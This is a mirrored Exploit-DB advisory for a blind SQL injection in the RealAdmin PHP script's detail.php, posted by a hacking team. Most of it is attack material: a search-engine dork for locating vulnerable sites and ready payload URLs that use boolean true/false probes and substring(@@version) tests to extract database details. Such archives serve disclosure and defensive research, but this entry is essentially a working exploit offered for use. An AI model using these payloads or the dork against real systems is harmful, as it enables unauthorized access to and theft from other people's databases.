exploit-db-mirror/platforms/php/webapps/11325.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

30 lines
No EOL
1.1 KiB
Text
Executable file

RealAdmin (detail.php) Blind Sql Injection Vulnerability
========================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : RealAdmin
.:. Download Script: http://www.redcow.ca/products/realadmin/
.:. Bug Type : Blind Sql Injection
.:. Dork : "Powered by RealAdmin and Red Cow Technologies, Inc."
####################################################################
===[ Exploit ]===
www.site.com/detail.php?id=[Blind SQL INJECTION]
www.site.com/detail.php?id=NULL+and+1=1 >>> True
www.site.com/detail.php?id=NULL+and+1=2 >>> False
www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5 >>> True
www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4 >>> False
####################################################################
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack